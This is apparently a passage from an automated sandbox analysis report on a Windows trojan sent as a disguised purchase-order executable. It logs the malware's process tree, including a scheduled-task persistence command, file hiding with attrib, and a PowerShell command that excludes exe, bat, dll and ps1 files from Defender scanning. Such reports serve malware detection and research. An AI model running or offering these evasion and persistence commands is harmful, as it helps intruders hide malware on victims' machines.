                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,10_2_004333BE
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 12_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,12_2_004333BE
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: String function: 00416C70 appears 68 times
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: String function: 004181F2 appears 38 times
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: String function: 0041341F appears 36 times
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeCode function: 1_2_00007FFDC3D41D99 NtSetValueKey,1_2_00007FFDC3D41D99
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,10_2_00431BE8
                        Source: #U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: UALDJT.lnk.0.drLNK file: ..\..\..\..\..\Windata\Acrobat Reader DC.exe
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeFile created: C:\Users\user\AppData\Roaming\WindataJump to behavior
                        Source: classification engineClassification label: mal100.troj.evad.winEXE@30/12@0/3
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeFile read: C:\Users\desktop.iniJump to behavior
                        Source: NRHRAS.exe.0.dr, ?????????????/???????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                        Source: 1.0.NRHRAS.exe.2f0000.0.unpack, ?????????????/?????????????.csSecurity API names: System.Void System.IO.File::SetAccessControl(System.String,System.Security.AccessControl.FileSecurity)
                        Source: 1.0.NRHRAS.exe.2f0000.0.unpack, ?????????????/?????????????.csSecurity API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                        Source: 1.0.NRHRAS.exe.2f0000.0.unpack, ?????????????/?????????????.csSecurity API names: System.Security.AccessControl.FileSecurity System.IO.File::GetAccessControl(System.String)
                        Source: NRHRAS.exe.0.dr, ?????????????/?????????????.csSecurity API names: System.Void System.IO.File::SetAccessControl(System.String,System.Security.AccessControl.FileSecurity)
                        Source: NRHRAS.exe.0.dr, ?????????????/?????????????.csSecurity API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                        Source: NRHRAS.exe.0.dr, ?????????????/?????????????.csSecurity API names: System.Security.AccessControl.FileSecurity System.IO.File::GetAccessControl(System.String)
                        Source: 1.0.NRHRAS.exe.2f0000.0.unpack, ?????????????/???????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                        Source: Chrome.exe.1.dr, ?????????????/?????????????.csSecurity API names: System.Void System.IO.File::SetAccessControl(System.String,System.Security.AccessControl.FileSecurity)
                        Source: Chrome.exe.1.dr, ?????????????/?????????????.csSecurity API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                        Source: Chrome.exe.1.dr, ?????????????/?????????????.csSecurity API names: System.Security.AccessControl.FileSecurity System.IO.File::GetAccessControl(System.String)
                        Source: Chrome.exe.1.dr, ?????????????/???????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_0044AF6C GetLastError,FormatMessageW,10_2_0044AF6C
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,10_2_0043305F
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user~1\AppData\Local\Temp\UALDJT.vbs
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp1D8D.tmp.bat""
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeFile read: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeJump to behavior
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeProcess created: C:\Users\user\AppData\Local\Temp\NRHRAS.exe "C:\Users\user\AppData\Local\Temp\NRHRAS.exe"
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn UALDJT.exe /tr C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe /sc minute /mo 1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn UALDJT.exe /tr C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe /sc minute /mo 1
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user~1\AppData\Local\Temp\UALDJT.vbs
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess created: C:\Windows\System32\attrib.exe C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\Stub
                        Source: C:\Windows\System32\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess created: C:\Windows\System32\attrib.exe C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\Stub\Chrome.exe
                        Source: C:\Windows\System32\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe "C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe "C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe"
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp1D8D.tmp.bat""
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe "C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Stub\Chrome.exe "C:\Users\user\AppData\Roaming\Stub\Chrome.exe"
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeProcess created: C:\Users\user\AppData\Local\Temp\NRHRAS.exe "C:\Users\user\AppData\Local\Temp\NRHRAS.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn UALDJT.exe /tr C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe /sc minute /mo 1Jump to behavior
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user~1\AppData\Local\Temp\UALDJT.vbsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess created: C:\Windows\System32\attrib.exe C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\StubJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess created: C:\Windows\System32\attrib.exe C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\Stub\Chrome.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp1D8D.tmp.bat""Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn UALDJT.exe /tr C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe /sc minute /mo 1Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3 Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Stub\Chrome.exe "C:\Users\user\AppData\Roaming\Stub\Chrome.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,10_2_004333BE
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 12_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,12_2_004333BE
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
